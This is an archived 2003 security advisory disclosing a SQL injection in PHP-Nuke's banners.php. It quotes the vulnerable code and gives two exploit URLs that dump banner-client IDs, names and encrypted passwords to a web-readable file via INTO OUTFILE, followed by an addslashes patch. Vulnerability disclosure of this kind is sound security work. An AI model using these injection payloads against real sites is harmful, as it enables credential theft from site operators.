logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

PHP-Nuke : banners.php SQL Injection
Date: 2003-03-22

Author : frog-m@n - leseulfroghotmail.com

Informations :
°°°°°°°°°°°°°°
language : PHP
Website : http://www.phpnuke.org
Versions : 5.6, 6.0, 6.5 RC1, 6.5 RC2, 6.5 RC3, 6.5
Problem : SQL Injection
Config : This will work if magic_quotes_gpc=OFF


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
banners.php :
------------------------------------------------------------------------
[...]
function bannerstats($login, $pass) {
global $prefix, $db, $sitename;
$sql = "SELECT cid, name, passwd FROM ".$prefix."_bannerclient WHERE
login='$login'";
$result = $db->sql_query($sql);
$row = $db->sql_fetchrow($result);
[...]


function change_banner_url_by_client($login, $pass, $cid, $bid, $url,
$alttext) {
global $prefix, $db;
$sql = "SELECT passwd FROM ".$prefix."_bannerclient WHERE cid='$cid'";
$result = $db->sql_query($sql);
$row = $db->sql_fetchrow($result);
$passwd = $row[passwd];
if (!empty($pass) AND $pass==$passwd) {
$alttext = ereg_replace("\"", "", $alttext);
$alttext = ereg_replace("'", "", $alttext);
$db->sql_query("UPDATE ".$prefix."_banner SET clickurl='$url',
alttext='$alttext' WHERE bid='$bid'");
echo "<br><center>";
if ($url != "") {
echo "You changed the URL<br>";
}
if ($alttext != "") {
echo "You changed the Alternate Text";
}
echo "<br><br><a href=\"javascript:history.go(-1)\">Back to Stats
Page</a></center>";
} else {
echo "<center><br>Your login/password doesn't match.<br><br>Please <a
href=\"banners.php?op=login\">login again</a></center>";
}


}


switch($op) {


[...]


case "Ok":
bannerstats($login, $pass);
break;


case "Change":
change_banner_url_by_client($login, $pass, $cid, $bid, $url, $alttext);
break;


}
[...]


?>
------------------------------------------------------------------------

Exploit :
°°°°°°°°°
This will save id, name and crypted password into
http://[target]/banners1.txt :
http://[target]/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt


This will save crypted password into http://[target]/banners2.txt :
http://[target]/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .
Into banners.php, put befoire the switch :
--------------------------
$cid=addslashes($cid);
$login=addslashes($login);
--------------------------

More details :
°°°°°°°°°°°°°°
in French :
http://www.frogsecure.com/tutos/PHP-Nuke-banners.php.txt

frog-m@n




 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy